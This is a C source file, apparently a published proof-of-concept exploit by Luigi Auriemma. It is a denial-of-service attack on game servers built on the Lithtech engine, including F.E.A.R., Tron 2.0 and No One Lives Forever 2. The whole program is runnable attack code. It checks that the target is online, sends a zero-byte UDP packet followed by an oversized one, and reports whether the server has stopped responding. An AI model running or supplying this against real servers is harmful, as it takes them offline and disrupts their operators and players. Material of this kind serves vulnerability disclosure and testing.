/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER     "0.1.1"
#define BUFFSZ  8195    // 8193 is the minimum
#define PORT    27888
#define TIMEOUT 3
#define CHECK   "\x10\x7f\x33\x01"
#define SEND(x) sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))



int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            noreply = 0;
    u_short port = PORT;
    u_char  buff[BUFFSZ + 1];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Lithtech engine (new protocol) socket unreacheable "VER"\n"
        "  Contract Jack           <= 1.1\n"
        "  F.E.A.R.                <= 1.02\n"
        "  No one lives forever 2  <= 1.3\n"
        "  Tron 2.0                <= 1.042\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("- check if server is online\n", stdout);
    if(SEND(CHECK) < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nAlert: socket timeout, I try to continue\n\n", stdout);
        noreply = 1;
    } else {
        len = recvfrom(sd, buff, sizeof(buff), 0, NULL, NULL);
        if(len < 0) std_err();
        if(memcmp(buff, CHECK, 3)) {
            if(*buff == '\\') {
                fputs("- received an information reply, seems you have specified a wrong port.\n"
                    "  Try with a lower one\n", stdout);
            } else {
                fputs("\nError: unknown data received, this is none of the vulnerable games\n\n", stdout);
            }
            exit(1);
        }
    }

    fputs("- send a ZERO bytes packet\n", stdout);
    SEND("");

    fputs("- wait one second\n", stdout);
    sleep(ONESEC);

    printf("- send a packet of %d bytes\n", BUFFSZ);
    memset(buff, 0, BUFFSZ);
    SEND(buff);

    fputs("- wait one second\n", stdout);
    sleep(ONESEC);

    fputs("- check if the server is vulnerable:\n", stdout);
    SEND(CHECK);
    if(timeout(sd) < 0) {
        if(noreply) {
            fputs("\nNo reply from the server, check it manually\n\n", stdout);
        } else {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        }
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}




#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


